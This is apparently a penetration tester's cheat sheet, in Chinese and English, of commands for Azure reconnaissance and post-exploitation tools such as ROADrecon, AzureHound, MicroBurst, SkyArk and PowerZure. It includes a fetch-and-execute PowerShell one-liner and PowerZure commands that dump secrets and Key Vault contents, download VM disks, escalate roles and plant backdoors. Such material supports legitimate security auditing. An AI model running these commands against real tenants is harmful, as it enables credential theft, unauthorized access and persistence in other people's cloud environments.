>pipenv shell
>roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
>roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
>roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
>roadrecon gather
>roadrecon gui
https://github.com/Azure/Stormspotter
https://github.com/BloodHoundAD/AzureHound
>. C:\Tools\AzureHound\AzureHound.ps1
>Invoke-AzureHound -Verbose
GUI
bolt://localhost:7687
Username: neo4j
Password: BloodHound
Azucar 自动收集各种配置数据并分析与特定订阅相关的所有数据
使用至少对要访问的资产具有读取权限的帐户
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
解析特定用户名的 TenantID
PS> .\Azucar.ps1 -ResolveTenantUserName [email protected]
Azurite Explorer和Azurite Visualizer:Microsoft Azure云中的枚举和侦察活动 >git clone https://github.com/mwrlabs/Azurite.git
>git clone https://github.com/FSecureLABS/Azurite
>git submodule init
>git submodule update
>PS> Import-Module AzureRM
>PS> Import-Module AzuriteExplorer.ps1
>PS> Review-AzureRmSubscription
>PS> Review-CustomAzureRmSubscription
包括支持 Azure 服务发现、弱配置审计和后利用操作(例如凭据转储)的函数和脚本
>git clone https://github.com/NetSPI/MicroBurst
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
发现扫描的 Azure 环境中的最高特权用户 - 包括 Azure shadow admin
要求:
Azure 目录的只读权限
订阅的只读权限
需要 AZ 和 AzureAD 模块或管理员权限
$ git clone https://github.com/cyberark/SkyArk
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Import-Module .\SkyArk.ps1 -force
PS C> Start-AzureStealth
or in the Cloud Console
PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
PS C> Scan-AzureAdmins
>git clone https://github.com/hausec/PowerZure
>ipmo .\PowerZure
>Set-Subscription -Id [idgoeshere]
Reader
>Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
Contributor
>Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
>Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml"
>Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
>Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
Owner
>Set-Role -Role Contributor -User [email protected] -Resource Win10VMTest
Administrator
>Create-Backdoor, Execute-Backdoor